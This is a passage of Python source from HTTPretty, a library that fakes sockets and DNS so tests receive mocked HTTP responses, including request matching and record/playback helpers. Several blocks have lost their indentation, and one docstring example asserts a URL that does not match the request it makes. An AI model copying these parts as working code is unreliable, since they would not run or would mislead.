        :param qs: a querystring
        :returns: a dict of lists
        """
        expanded = unquote_utf8(qs)
        parsed = parse_qs(expanded)
        result = {}
        for k in parsed:
            result[k] = list(map(decode_utf8, parsed[k]))
        return result

    def parse_request_body(self, body):
        """Attempt to parse the post based on the content-type passed.
        Return the regular body if not.

        :param body: string
        :returns: a python object such as dict or list in case the deserialization succeeded. Else returns the given param ``body``
        """
        PARSING_FUNCTIONS = {
            'application/json': json.loads,
            'text/json': json.loads,
            'application/x-www-form-urlencoded': self.parse_querystring,
        }
        content_type = self.headers.get('content-type', '')
        do_parse = PARSING_FUNCTIONS.get(content_type, FALLBACK_FUNCTION)
        try:
            body = decode_utf8(body)
            return do_parse(body)
        # NOTE(review): catching BaseException also swallows KeyboardInterrupt
        # and SystemExit — consider narrowing to Exception.
        except (Exception, BaseException):
            return body
class EmptyRequestHeaders(dict):
    """A dict subclass used as the internal representation of empty request
    headers.
    """
class HTTPrettyRequestEmpty(object):
    """Represents an empty :py:class:`~httpretty.core.HTTPrettyRequest`
    where all its properties are somehow empty or ``None``
    """
    # Nothing was parsed for an empty request: no method, no url.
    method = None
    url = None
    # Empty string body and an empty header mapping.
    body = ''
    headers = EmptyRequestHeaders()
class FakeSockFile(object):
    """File-like stand-in for a socket's file descriptor.

    All data lives in a real temporary file, so the object exposes a
    genuine OS-level file descriptor number.
    """

    def __init__(self):
        self.file = tempfile.TemporaryFile()
        self._fileno = self.file.fileno()

    def getvalue(self):
        """Return the buffered contents, however the backing file exposes them."""
        try:
            return self.file.getvalue()
        except AttributeError:
            return self.file.read()

    def close(self):
        """Close the associated socket first, then the backing file."""
        self.socket.close()
        self.file.close()

    def fileno(self):
        """Return the descriptor captured at construction time."""
        return self._fileno

    def __getattr__(self, name):
        # Everything else (read/write/seek/...) is delegated to the tempfile.
        return getattr(self.file, name)
class FakeSSLSocket(object):
    """Transparent SSL-looking wrapper that proxies everything to a fakesock."""

    def __init__(self, sock, *args, **kw):
        self._httpretty_sock = sock

    def __getattr__(self, attr):
        # Delegate any attribute not found here to the wrapped socket.
        return getattr(self._httpretty_sock, attr)
class fakesock(object):
"""
fake :py:mod:`socket`
"""
class socket(object):
"""drop-in replacement for :py:class:`socket.socket`
"""
_entry = None
debuglevel = 0
_sent_data = []
        def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM,
                     protocol=0, _sock=None):
            # `socket` here is the real stdlib module (the nested class name
            # is not yet bound while this def executes).
            # Only create a real socket when unmocked connections are allowed;
            # otherwise non-intercepted traffic must fail via UnmockedError.
            self.truesock = (old_socket(family, type, protocol)
                             if httpretty.allow_net_connect
                             else None)
            self._connected_truesock = False
            # NOTE(review): starts out marked closed even though it was just
            # constructed — presumably "not yet connected"; confirm.
            self._closed = True
            self.fd = FakeSockFile()
            # Give the fake file a back-reference to the outermost socket.
            self.fd.socket = _sock or self
            self.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
            self._sock = _sock or self
            self.is_http = False
            self._bufsize = 1024
def getpeercert(self, *a, **kw):
now = datetime.now()
shift = now + timedelta(days=30 * 12)
return {
'notAfter': shift.strftime('%b %d %H:%M:%S GMT'),
'subjectAltName': (
('DNS', '*.%s' % self._host),
('DNS', self._host),
('DNS', '*'),
),
'subject': (
(
('organizationName', '*.%s' % self._host),
),
(
('organizationalUnitName',
'Domain Control Validated'),
),
(
('commonName', '*.%s' % self._host),
),
),
}
def ssl(self, sock, *args, **kw):
return sock
def setsockopt(self, level, optname, value):
if self.truesock:
self.truesock.setsockopt(level, optname, value)
        def connect(self, address):
            """Classify the connection as HTTP(S) (mockable) or passthrough.

            Non-HTTP traffic goes straight to the real socket when one is
            available; otherwise an UnmockedError is raised.
            """
            self._closed = False
            try:
                self._address = (self._host, self._port) = address
            except ValueError:
                # We get here when the address is just a string pointing to a
                # unix socket path/file
                #
                # See issue #206
                self.is_http = False
            else:
                # HTTP(S) is decided purely by port: 80/443 plus any extra
                # ports registered in the POTENTIAL_* sets.
                ports_to_check = (
                    POTENTIAL_HTTP_PORTS.union(POTENTIAL_HTTPS_PORTS))
                self.is_http = self._port in ports_to_check
            if not self.is_http:
                # NOTE(review): an already-connected truesock falls into the
                # raise branch below — verify reconnects cannot happen here.
                if self.truesock and not self._connected_truesock:
                    self.truesock.connect(self._address)
                    self._connected_truesock = True
                else:
                    raise UnmockedError()
            elif self.truesock and not self._connected_truesock:
                # HTTP port but no registered entry matches this host:port —
                # connect for real so the request can fall through.
                matcher = httpretty.match_http_address(self._host, self._port)
                if matcher is None:
                    self.truesock.connect(self._address)
                    self._connected_truesock = True
def fileno(self):
if self.truesock:
return self.truesock.fileno()
return self.fd.fileno()
def close(self):
if self._connected_truesock:
self.truesock.close()
self._connected_truesock = False
self._closed = True
        def makefile(self, mode='r', bufsize=-1):
            """Returns this fake socket's own tempfile buffer.

            If there is an entry associated with the socket, the file
            descriptor gets filled in with the entry data before being
            returned.
            """
            self._mode = mode
            self._bufsize = bufsize
            if self._entry:
                # Fill the fd in a helper thread so a slow/blocking entry can
                # be bounded by this socket's timeout below.
                t = threading.Thread(
                    target=self._entry.fill_filekind, args=(self.fd,)
                )
                t.start()
                if self.timeout == socket._GLOBAL_DEFAULT_TIMEOUT:
                    # Default timeout means wait indefinitely, like a real
                    # blocking socket.
                    timeout = None
                else:
                    timeout = self.timeout
                t.join(timeout)
                if t.is_alive():
                    # Fill did not finish in time: mimic a real socket timeout.
                    raise socket.timeout
            return self.fd
def real_sendall(self, data, *args, **kw):
    """Sends data to the remote server. This method is called
    when HTTPretty identifies that someone is trying to send
    non-http data.
    The received bytes are written in this socket's tempfile
    buffer so that HTTPretty can return it accordingly when
    necessary.

    :raises UnmockedError: when there is no real socket to send through
    """
    if not self.truesock:
        raise UnmockedError()
    if not self.is_http:
        # raw (non-HTTP) traffic: pass straight through, nothing to record
        return self.truesock.sendall(data, *args, **kw)
    if self._address[1] == 443 and old_sslsocket:
        # real HTTPS endpoint: wrap with the *original* (pre-monkeypatch)
        # SSL socket class
        sock = old_sslsocket(self.truesock)
    else:
        sock = self.truesock
    if not self._connected_truesock:
        sock.connect(self._address)
    sock.setblocking(1)
    sock.sendall(data, *args, **kw)
    should_continue = True
    while should_continue:
        try:
            # NOTE(review): self._bufsize is only set by makefile() and
            # defaults to -1 there; recv(-1) fails on a real socket —
            # confirm callers always go through makefile() first.
            received = sock.recv(self._bufsize)
            self.fd.write(received)
            # stop once the server sends an empty/whitespace-only chunk
            should_continue = bool(received.strip())
        except socket.error as e:
            if e.errno == EAGAIN:
                continue
            break
    # rewind so the buffered response can be read back from the start
    self.fd.seek(0)
def sendall(self, data, *args, **kw):
    """Intercept outgoing request bytes, match them against the registry
    of mocked URIs, and fall back to the real socket when nothing matches.

    :param data: raw bytes the client is attempting to send
    """
    self._sent_data.append(data)
    self.fd = FakeSockFile()
    self.fd.socket = self
    try:
        requestline, _ = data.split(b'\r\n', 1)
        method, path, version = parse_requestline(
            decode_utf8(requestline))
        is_parsing_headers = True
    except ValueError:
        # not a request line: this payload is a continuation of the
        # previous request's body (e.g. a chunk of a chunked upload)
        path = ''
        is_parsing_headers = False

        if self._entry is None:
            # If the previous request wasn't mocked, don't
            # mock the subsequent sending of data
            return self.real_sendall(data, *args, **kw)
        else:
            method = self._entry.method
            path = self._entry.info.path

    self.fd.seek(0)

    if not is_parsing_headers:
        if len(self._sent_data) > 1:
            headers = utf8(last_requestline(self._sent_data))
            meta = self._entry.request.headers
            body = utf8(self._sent_data[-1])
            if meta.get('transfer-encoding', '') == 'chunked':
                # skip the framing pieces of a chunked body (chunk sizes,
                # separators, and the terminating 0-chunk)
                if not body.isdigit() and (body != b'\r\n') and (body != b'0\r\n\r\n'):
                    self._entry.request.body += body
            else:
                self._entry.request.body += body

            httpretty.historify_request(headers, body, False)
            return

    # path might come with
    s = urlsplit(path)
    POTENTIAL_HTTP_PORTS.add(int(s.port or 80))

    parts = list(map(utf8, data.split(b'\r\n\r\n', 1)))
    if len(parts) == 2:
        headers, body = parts
    else:
        headers = ''
        body = data

    request = httpretty.historify_request(headers, body)

    info = URIInfo(
        hostname=self._host,
        port=self._port,
        path=s.path,
        query=s.query,
        last_request=request
    )

    matcher, entries = httpretty.match_uriinfo(info)

    if not entries:
        # nothing registered for this URI: remember that and go real
        self._entry = None
        self.real_sendall(data)
        return

    self._entry = matcher.get_next_entry(method, info, request)
def debug(self, truesock_func, *a, **kw):
    """Dispatch *truesock_func* to the real socket, or fail loudly.

    Mocked HTTP traffic has nothing sensible to delegate these low-level
    calls to, so an error carrying the caller's traceback is raised to
    make bug reports actionable.

    :param truesock_func: name of the real-socket method to invoke
    :raises RuntimeError: when called on a mocked (HTTP) socket
    :raises UnmockedError: when there is no real socket to delegate to
    """
    if self.is_http:
        frame = inspect.stack()[0][0]
        lines = list(map(utf8, traceback.format_stack(frame)))
        message = [
            "HTTPretty intercepted and unexpected socket method call.",
            ("Please open an issue at "
             "'https://github.com/gabrielfalcao/HTTPretty/issues'"),
            "And paste the following traceback:\n",
            # BUG FIX: previously this was "".join(decode_utf8(lines)),
            # but `lines` is a *list* of utf-8 byte strings, so joining
            # with a str separator raised TypeError instead of producing
            # the intended error message. Decode each line, then join.
            "".join(decode_utf8(line) for line in lines),
        ]
        raise RuntimeError("\n".join(message))
    if not self.truesock:
        raise UnmockedError()
    return getattr(self.truesock, truesock_func)(*a, **kw)
def settimeout(self, new_timeout):
    """Remember the timeout; it is honored later by :py:meth:`makefile`."""
    self.timeout = new_timeout
def send(self, *a, **kw):
    """Delegate ``send`` to the real socket via :py:meth:`debug`."""
    return self.debug('send', *a, **kw)

def sendto(self, *a, **kw):
    """Delegate ``sendto`` to the real socket via :py:meth:`debug`."""
    return self.debug('sendto', *a, **kw)

def recvfrom_into(self, *a, **kw):
    """Delegate ``recvfrom_into`` to the real socket via :py:meth:`debug`."""
    return self.debug('recvfrom_into', *a, **kw)

def recv_into(self, *a, **kw):
    """Delegate ``recv_into`` to the real socket via :py:meth:`debug`."""
    return self.debug('recv_into', *a, **kw)

def recvfrom(self, *a, **kw):
    """Delegate ``recvfrom`` to the real socket via :py:meth:`debug`."""
    return self.debug('recvfrom', *a, **kw)

def recv(self, *a, **kw):
    """Delegate ``recv`` to the real socket via :py:meth:`debug`."""
    return self.debug('recv', *a, **kw)
def __getattr__(self, name):
    """Fall through to the real socket for any attribute this fake does
    not implement itself.

    :raises UnmockedError: when there is no real socket to consult
    """
    if not self.truesock:
        raise UnmockedError()
    return getattr(self.truesock, name)
def fake_wrap_socket(orig_wrap_socket_fn, *args, **kw):
    """drop-in replacement for py:func:`ssl.wrap_socket`

    Only performs a real SSL wrap when the target hostname is *not* one
    of the mocked HTTPS hosts; mocked sockets are returned untouched.

    :param orig_wrap_socket_fn: the original (pre-monkeypatch) wrap function
    """
    server_hostname = kw.get('server_hostname')
    if server_hostname is not None:
        matcher = httpretty.match_https_hostname(server_hostname)
        if matcher is None:
            # unmocked host: defer to the real wrapping function
            return orig_wrap_socket_fn(*args, **kw)
    # mocked (or hostname-less) call: hand back the plain socket, whether
    # it arrived as a keyword or as the first positional argument
    if 'sock' in kw:
        return kw['sock']
    else:
        return args[0]
def create_fake_connection(
        address,
        timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
        source_address=None):
    """drop-in replacement for :py:func:`socket.create_connection`

    Builds a fake TCP socket, applies the optional timeout and source
    address just like the stdlib helper, then connects it.
    """
    s = fakesock.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:
        s.settimeout(timeout)
    if source_address:
        s.bind(source_address)
    s.connect(address)
    return s
def fake_gethostbyname(host):
    """drop-in replacement for :py:func:`socket.gethostbyname`

    Every hostname resolves to the loopback address, so no real DNS
    lookup ever happens while HTTPretty is enabled.
    """
    return '127.0.0.1'
def fake_gethostname():
    """drop-in replacement for :py:func:`socket.gethostname`

    Always reports ``localhost`` while HTTPretty is enabled.
    """
    return 'localhost'
def fake_getaddrinfo(
        host, port, family=None, socktype=None, proto=None, flags=None):
    """drop-in replacement for :py:func:`socket.getaddrinfo`

    Always yields a single IPv4/TCP candidate aimed directly at the
    requested endpoint; the resolver hint arguments are accepted but
    deliberately ignored.
    """
    addr = (host, port)
    return [(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, '', addr)]
class Entry(BaseClass):
    """Created by :py:meth:`~httpretty.core.httpretty.register_uri` and
    stored in memory as internal representation of a HTTP
    request/response definition.
    :param method: string
    :param uri: string
    :param body: string
    :param adding_headers: dict - headers to be added to the response
    :param forcing_headers: dict - headers to be forcefully set in the response
    :param status: an integer (e.g.: ``status=200``)
    :param streaming: bool - whether to stream the response
    :param headers: keyword-args with headers to be added to the response
    .. warning:: When using the ``forcing_headers`` option make sure to add the header ``Content-Length`` otherwise calls using :py:mod:`requests` will try to load the response endlessly.
    """
    def __init__(self, method, uri, body,
                 adding_headers=None,
                 forcing_headers=None,
                 status=200,
                 streaming=False,
                 **headers):
        self.method = method
        self.uri = uri
        self.info = None      # URIInfo; attached later by the matcher
        self.request = None   # the request that selected this entry
        self.body_is_callable = False
        if hasattr(body, "__call__"):
            # callable body: invoked lazily in fill_filekind
            self.callable_body = body
            self.body = None
            self.body_is_callable = True
        elif isinstance(body, text_type):
            self.body = utf8(body)
        else:
            self.body = body
        self.streaming = streaming
        if not streaming and not self.body_is_callable:
            self.body_length = len(self.body or '')
        else:
            # length unknown until the body is produced/consumed
            self.body_length = 0
        self.adding_headers = adding_headers or {}
        self.forcing_headers = forcing_headers or {}
        self.status = int(status)
        for k, v in headers.items():
            # keyword args like content_type become "Content-Type"
            name = "-".join(k.split("_")).title()
            self.adding_headers[name] = v
        self.validate()

    def validate(self):
        """validates the body size with the value of the ``Content-Length``
        header
        """
        content_length_keys = 'Content-Length', 'content-length'
        for key in content_length_keys:
            got = self.adding_headers.get(
                key, self.forcing_headers.get(key, None))

            if got is None:
                continue

            igot = None
            try:
                igot = int(got)
            except (ValueError, TypeError):
                # non-numeric declared length: warn and give up validating
                warnings.warn(
                    'HTTPretty got to register the Content-Length header '
                    'with "%r" which is not a number' % got)
                return

            if igot and igot > self.body_length:
                raise HTTPrettyError(
                    'HTTPretty got inconsistent parameters. The header '
                    'Content-Length you registered expects size "%d" but '
                    'the body you registered for that has actually length '
                    '"%d".' % (
                        igot, self.body_length,
                    )
                )

    def __str__(self):
        return r'<Entry {} {} getting {}>'.format(
            self.method,
            self.uri,
            self.status
        )

    def normalize_headers(self, headers):
        """Normalize keys in header names so that ``COntent-tyPe`` becomes ``content-type``
        :param headers: dict
        :returns: dict
        """
        new = {}
        for k in headers:
            new_k = '-'.join([s.lower() for s in k.split('-')])
            new[new_k] = headers[k]
        return new

    def fill_filekind(self, fk):
        """writes HTTP Response data to a file descriptor
        :parm fk: a file-like object
        .. warning:: **side-effect:** this method moves the cursor of the given file object to zero
        """
        # NOTE(review): utcnow() is deprecated on modern Pythons; only a
        # GMT-formatted timestamp is needed here.
        now = datetime.utcnow()
        headers = {
            'status': self.status,
            'date': now.strftime('%a, %d %b %Y %H:%M:%S GMT'),
            'server': 'Python/HTTPretty',
            'connection': 'close',
        }
        if self.forcing_headers:
            # forced headers replace the defaults wholesale
            headers = self.forcing_headers

        if self.adding_headers:
            headers.update(
                self.normalize_headers(
                    self.adding_headers))

        headers = self.normalize_headers(headers)
        status = headers.get('status', self.status)
        if self.body_is_callable:
            # the callable decides status, headers and body at request time
            status, headers, self.body = self.callable_body(self.request, self.info.full_url(), headers)
            headers = self.normalize_headers(headers)
            # TODO: document this behavior:
            if 'content-length' not in headers:
                headers.update({
                    'content-length': len(self.body)
                })

        string_list = [
            'HTTP/1.1 %d %s' % (status, STATUSES[status]),
        ]

        if 'date' in headers:
            string_list.append('date: %s' % headers.pop('date'))

        if not self.forcing_headers:
            content_type = headers.pop('content-type',
                                       'text/plain; charset=utf-8')

            content_length = headers.pop('content-length',
                                         self.body_length)

            string_list.append('content-type: %s' % content_type)
            if not self.streaming:
                # a streamed response has no predetermined length
                string_list.append('content-length: %s' % content_length)

            server = headers.pop('server', None)
            if server:
                string_list.append('server: %s' % server)

        for k, v in headers.items():
            string_list.append(
                '{}: {}'.format(k, v),
            )

        for item in string_list:
            fk.write(utf8(item) + b'\n')

        fk.write(b'\r\n')

        if self.streaming:
            # tee so this generator body can be served again on a later call
            self.body, body = itertools.tee(self.body)
            for chunk in body:
                fk.write(utf8(chunk))
        else:
            fk.write(utf8(self.body))

        # side effect documented above: rewind for the reader
        fk.seek(0)
def url_fix(s, charset=None):
    """escapes special characters

    Percent-encodes unsafe characters in the path and query of *s* while
    leaving scheme, netloc and fragment untouched.
    """
    if charset:
        warnings.warn("{}.url_fix() charset argument is deprecated".format(__name__), DeprecationWarning)
    scheme, netloc, path, query, fragment = urlsplit(s)
    return urlunsplit((
        scheme,
        netloc,
        quote(path, b'/%'),
        quote_plus(query, b':&='),
        fragment,
    ))
class URIInfo(BaseClass):
    """Internal representation of `URIs <https://en.wikipedia.org/wiki/Uniform_Resource_Identifier>`_
    .. tip:: all arguments are optional
    :param username:
    :param password:
    :param hostname:
    :param port:
    :param path:
    :param query:
    :param fragment:
    :param scheme:
    :param last_request:
    """
    # attributes rendered by the default __str__
    default_str_attrs = (
        'username',
        'password',
        'hostname',
        'port',
        'path',
    )

    def __init__(self,
                 username='',
                 password='',
                 hostname='',
                 port=80,
                 path='/',
                 query='',
                 fragment='',
                 scheme='',
                 last_request=None):
        self.username = username or ''
        self.password = password or ''
        self.hostname = hostname or ''

        if port:
            port = int(port)
        elif scheme == 'https':
            # no explicit port on an https URI: assume 443
            port = 443

        self.port = port or 80
        self.path = path or ''
        if query:
            # re-encode the query from sorted parsed items so that
            # parameter ordering never affects matching/equality
            query_items = sorted(parse_qs(query).items())
            self.query = urlencode(
                encode_obj(query_items),
                doseq=True,
            )
        else:
            self.query = ''
        if scheme:
            self.scheme = scheme
        elif self.port in POTENTIAL_HTTPS_PORTS:
            # infer https from a known https port when no scheme was given
            self.scheme = 'https'
        else:
            self.scheme = 'http'
        self.fragment = fragment or ''
        self.last_request = last_request

    def to_str(self, attrs):
        """Render ``<httpretty.URIInfo(...)>`` showing the given *attrs*."""
        fmt = ", ".join(['%s="%s"' % (k, getattr(self, k, '')) for k in attrs])
        return r'<httpretty.URIInfo(%s)>' % fmt

    def __str__(self):
        return self.to_str(self.default_str_attrs)

    def str_with_query(self):
        """Like ``__str__`` but also includes the normalized query string."""
        attrs = self.default_str_attrs + ('query',)
        return self.to_str(attrs)

    def __hash__(self):
        # NOTE(review): binary_type(self, 'ascii') looks wrong on py3 —
        # bytes() needs a str first argument; this probably meant
        # binary_type(text_type(self), 'ascii'). Confirm before relying
        # on hashing URIInfo instances (matchers hash via text_type).
        return int(hashlib.sha1(binary_type(self, 'ascii')).hexdigest(), 16)

    def __eq__(self, other):
        # equality ignores the query string on purpose: URIMatcher
        # compares queries separately when match_querystring is set
        self_tuple = (
            self.port,
            decode_utf8(self.hostname.lower()),
            url_fix(decode_utf8(self.path)),
        )
        other_tuple = (
            other.port,
            decode_utf8(other.hostname.lower()),
            url_fix(decode_utf8(other.path)),
        )
        return self_tuple == other_tuple

    def full_url(self, use_querystring=True):
        """
        :param use_querystring: bool
        :returns: a string with the full url with the format ``{scheme}://{credentials}{domain}{path}{query}``
        """
        credentials = ""
        if self.password:
            credentials = "{}:{}@".format(
                self.username, self.password)

        query = ""
        if use_querystring and self.query:
            query = "?{}".format(decode_utf8(self.query))

        result = "{scheme}://{credentials}{domain}{path}{query}".format(
            scheme=self.scheme,
            credentials=credentials,
            domain=self.get_full_domain(),
            path=decode_utf8(self.path),
            query=query
        )
        return result

    def get_full_domain(self):
        """
        :returns: a string in the form ``{domain}:{port}`` or just the domain if the port is 80 or 443
        """
        hostname = decode_utf8(self.hostname)
        # Port 80/443 should not be appended to the url
        if self.port not in DEFAULT_HTTP_PORTS | DEFAULT_HTTPS_PORTS:
            return ":".join([hostname, str(self.port)])

        return hostname

    @classmethod
    def from_uri(cls, uri, entry):
        """
        :param uri: string
        :param entry: an instance of :py:class:`~httpretty.core.Entry`
        """
        result = urlsplit(uri)
        if result.scheme == 'https':
            # remember this port as an https candidate for socket mocking
            POTENTIAL_HTTPS_PORTS.add(int(result.port or 443))
        else:
            POTENTIAL_HTTP_PORTS.add(int(result.port or 80))
        return cls(result.username,
                   result.password,
                   result.hostname,
                   result.port,
                   result.path,
                   result.query,
                   result.fragment,
                   result.scheme,
                   entry)
class URIMatcher(object):
    """Matches incoming request URIs against one registered URI (either a
    plain string or a compiled regular expression) and cycles through the
    response entries registered for it.
    """
    regex = None   # set when the registered uri is a compiled pattern
    info = None    # set (URIInfo) when the registered uri is a string

    def __init__(self, uri, entries, match_querystring=False, priority=0):
        self._match_querystring = match_querystring
        # CPython, Jython
        # detect compiled regexes by type name so this works across
        # interpreters and re implementations
        regex_types = ('SRE_Pattern', 'org.python.modules.sre.PatternObject',
                       'Pattern')
        is_regex = type(uri).__name__ in regex_types
        if is_regex:
            self.regex = uri
            result = urlsplit(uri.pattern)
            if result.scheme == 'https':
                POTENTIAL_HTTPS_PORTS.add(int(result.port or 443))
            else:
                POTENTIAL_HTTP_PORTS.add(int(result.port or 80))
        else:
            self.info = URIInfo.from_uri(uri, entries)

        self.entries = entries
        self.priority = priority
        # hash of current_entry pointers, per method.
        self.current_entries = {}

    def matches(self, info):
        """Return truthy when *info* (a URIInfo) matches this matcher."""
        if self.info:
            # Query string is not considered when comparing info objects, compare separately
            return self.info == info and (not self._match_querystring or self.info.query == info.query)
        else:
            return self.regex.search(info.full_url(
                use_querystring=self._match_querystring))

    def __str__(self):
        wrap = 'URLMatcher({})'
        if self.info:
            if self._match_querystring:
                return wrap.format(text_type(self.info.str_with_query()))
            else:
                return wrap.format(text_type(self.info))
        else:
            return wrap.format(self.regex.pattern)

    def get_next_entry(self, method, info, request):
        """Cycle through available responses, but only once.
        Any subsequent requests will receive the last response"""
        if method not in self.current_entries:
            self.current_entries[method] = 0

        # restrict selection to entries that match the requested
        # method
        entries_for_method = [e for e in self.entries if e.method == method]

        if self.current_entries[method] >= len(entries_for_method):
            # exhausted: pin the pointer at -1 so the last entry repeats
            self.current_entries[method] = -1

        if not self.entries or not entries_for_method:
            raise ValueError('I have no entries for method %s: %s'
                             % (method, self))

        entry = entries_for_method[self.current_entries[method]]
        if self.current_entries[method] != -1:
            self.current_entries[method] += 1

        # Attach more info to the entry
        # So the callback can be more clever about what to do
        # This does also fix the case where the callback
        # would be handed a compiled regex as uri instead of the
        # real uri
        entry.info = info
        entry.request = request
        return entry

    def __hash__(self):
        # matchers hash/compare by their string rendering so that
        # re-registering the same uri merges entries (see register_uri)
        return hash(text_type(self))

    def __eq__(self, other):
        return text_type(self) == text_type(other)
class httpretty(HttpBaseClass):
    """manages HTTPretty's internal request/response registry and request matching.
    """
    # maps URIMatcher -> list of Entry
    _entries = {}
    # every request intercepted while enabled, newest last
    latest_requests = []
    last_request = HTTPrettyRequestEmpty()
    _is_enabled = False
    # when False, hitting an unregistered URL raises UnmockedError
    allow_net_connect = True
    @classmethod
    def match_uriinfo(cls, info):
        """
        :param info: an :py:class:`~httpretty.core.URIInfo`
        :returns: a 2-item tuple: (:py:class:`~httpretty.core.URLMatcher`, :py:class:`~httpretty.core.URIInfo`) or ``(None, [])``
        """
        # highest-priority matchers win; first match is returned
        items = sorted(
            cls._entries.items(),
            key=lambda matcher_entries: matcher_entries[0].priority,
            reverse=True,
        )
        for matcher, value in items:
            if matcher.matches(info):
                return (matcher, info)

        return (None, [])
    @classmethod
    def match_https_hostname(cls, hostname):
        """
        :param hostname: a string
        :returns: an :py:class:`~httpretty.core.URLMatcher` or ``None``
        """
        items = sorted(
            cls._entries.items(),
            key=lambda matcher_entries: matcher_entries[0].priority,
            reverse=True,
        )
        for matcher, value in items:
            if matcher.info is None:
                # regex-registered matcher: compare its leading hostname
                # portion against both "host:" and "host/" url shapes
                pattern_with_port = "https://{0}:".format(hostname)
                pattern_without_port = "https://{0}/".format(hostname)
                hostname_pattern = (
                    hostname_re
                    .match(matcher.regex.pattern)
                    .group(0)
                )
                for pattern in [pattern_with_port, pattern_without_port]:
                    if re.match(hostname_pattern, pattern):
                        return matcher

            elif matcher.info.hostname == hostname:
                return matcher
        return None
    @classmethod
    def match_http_address(cls, hostname, port):
        """
        :param hostname: a string
        :param port: an integer
        :returns: an :py:class:`~httpretty.core.URLMatcher` or ``None``
        """
        items = sorted(
            cls._entries.items(),
            key=lambda matcher_entries: matcher_entries[0].priority,
            reverse=True,
        )
        for matcher, value in items:
            if matcher.info is None:
                # regex-registered matcher: pick the scheme based on the
                # port and compare against both url shapes
                if port in POTENTIAL_HTTPS_PORTS:
                    scheme = 'https://'
                else:
                    scheme = 'http://'
                pattern_without_port = "{0}{1}/".format(scheme, hostname)
                pattern_with_port = "{0}{1}:{2}/".format(scheme, hostname, port)
                hostname_pattern = (
                    hostname_re
                    .match(matcher.regex.pattern)
                    .group(0)
                )
                for pattern in [pattern_with_port, pattern_without_port]:
                    if re.match(hostname_pattern, pattern):
                        return matcher

            elif matcher.info.hostname == hostname \
                    and matcher.info.port == port:
                return matcher

        return None
    @classmethod
    @contextlib.contextmanager
    def record(cls, filename, indentation=4, encoding='utf-8'):
        """
        .. testcode::
            import io
            import json
            import requests
            import httpretty
            with httpretty.record('/tmp/ip.json'):
                data = requests.get('https://httpbin.org/ip').json()
            with io.open('/tmp/ip.json') as fd:
                assert data == json.load(fd)
        :param filename: a string
        :param indentation: an integer, defaults to **4**
        :param encoding: a string, defaults to **"utf-8"**
        :returns: a `context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_
        """
        try:
            import urllib3
        except ImportError:
            msg = (
                'HTTPretty requires urllib3 installed '
                'for recording actual requests.'
            )
            raise RuntimeError(msg)

        http = urllib3.PoolManager()

        cls.enable()
        calls = []

        def record_request(request, uri, headers):
            # momentarily disable mocking so the real request goes out
            cls.disable()

            kw = {}
            kw.setdefault('body', request.body)
            kw.setdefault('headers', dict(request.headers))
            response = http.request(request.method, uri, **kw)
            calls.append({
                'request': {
                    'uri': uri,
                    'method': request.method,
                    'headers': dict(request.headers),
                    'body': decode_utf8(request.body),
                    'querystring': request.querystring
                },
                'response': {
                    'status': response.status,
                    'body': decode_utf8(response.data),
                    # urllib3 1.10 had a bug if you just did:
                    # dict(response.headers)
                    # which would cause all the values to become lists
                    # with the header name as the first item and the
                    # true value as the second item. Workaround that
                    'headers': dict(response.headers.items())
                }
            })
            cls.enable()
            return response.status, response.headers, response.data

        # catch every method on every url and proxy it through the recorder
        for method in cls.METHODS:
            cls.register_uri(method, MULTILINE_ANY_REGEX, body=record_request)

        yield
        cls.disable()
        with codecs.open(filename, 'w', encoding) as f:
            f.write(json.dumps(calls, indent=indentation))
@classmethod
@contextlib.contextmanager
def playback(cls, filename):
"""
.. testcode::
import io
import json
import requests
import httpretty
with httpretty.record('/tmp/ip.json'):
data = requests.get('https://httpbin.org/ip').json()
with io.open('/tmp/ip.json') as fd:
assert data == json.load(fd)
:param filename: a string
:returns: a `context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_
"""
cls.enable()
data = json.loads(open(filename).read())
for item in data:
uri = item['request']['uri']
method = item['request']['method']
body = item['response']['body']
headers = item['response']['headers']
cls.register_uri(method, uri, body=body, forcing_headers=headers)
yield
cls.disable()
    @classmethod
    def reset(cls):
        """resets the internal state of HTTPretty, unregistering all URLs
        """
        # drop any ports learned from registered URIs, keeping defaults
        POTENTIAL_HTTP_PORTS.intersection_update(DEFAULT_HTTP_PORTS)
        POTENTIAL_HTTPS_PORTS.intersection_update(DEFAULT_HTTPS_PORTS)
        cls._entries.clear()
        cls.latest_requests = []
        cls.last_request = HTTPrettyRequestEmpty()
    @classmethod
    def historify_request(cls, headers, body='', append=True):
        """appends request to a list for later retrieval
        .. testcode::
            import httpretty
            httpretty.register_uri(httpretty.GET, 'https://httpbin.org/ip', body='')
            with httpretty.enabled():
                requests.get('https://httpbin.org/ip')
            assert httpretty.latest_requests[-1].url == 'https://httpbin.org/ip'

        :param headers: raw header bytes/string for the request
        :param body: request body, defaults to empty
        :param append: when False, *replace* the most recent history entry
            (used for body continuations of one logical request)
        """
        request = HTTPrettyRequest(headers, body)
        cls.last_request = request
        if append or not cls.latest_requests:
            cls.latest_requests.append(request)
        else:
            cls.latest_requests[-1] = request
        return request
    @classmethod
    def register_uri(cls, method, uri, body='{"message": "HTTPretty :)"}',
                     adding_headers=None,
                     forcing_headers=None,
                     status=200,
                     responses=None,
                     match_querystring=False,
                     priority=0,
                     **headers):
        """
        .. testcode::
            import httpretty
            def request_callback(request, uri, response_headers):
                content_type = request.headers.get('Content-Type')
                assert request.body == '{"nothing": "here"}', 'unexpected body: {}'.format(request.body)
                assert content_type == 'application/json', 'expected application/json but received Content-Type: {}'.format(content_type)
                return [200, response_headers, json.dumps({"hello": "world"})]
            httpretty.register_uri(
                HTTPretty.POST, "https://httpretty.example.com/api",
                body=request_callback)
            with httpretty.enabled():
                requests.post('https://httpretty.example.com/api', data='{"nothing": "here"}', headers={'Content-Type': 'application/json'})
            assert httpretty.latest_requests[-1].url == 'https://httpbin.org/ip'
        :param method: one of ``httpretty.GET``, ``httpretty.PUT``, ``httpretty.POST``, ``httpretty.DELETE``, ``httpretty.HEAD``, ``httpretty.PATCH``, ``httpretty.OPTIONS``, ``httpretty.CONNECT``
        :param uri: a string (e.g.: **"https://httpbin.org/ip"**)
        :param body: a string, defaults to ``{"message": "HTTPretty :)"}``
        :param adding_headers: dict - headers to be added to the response
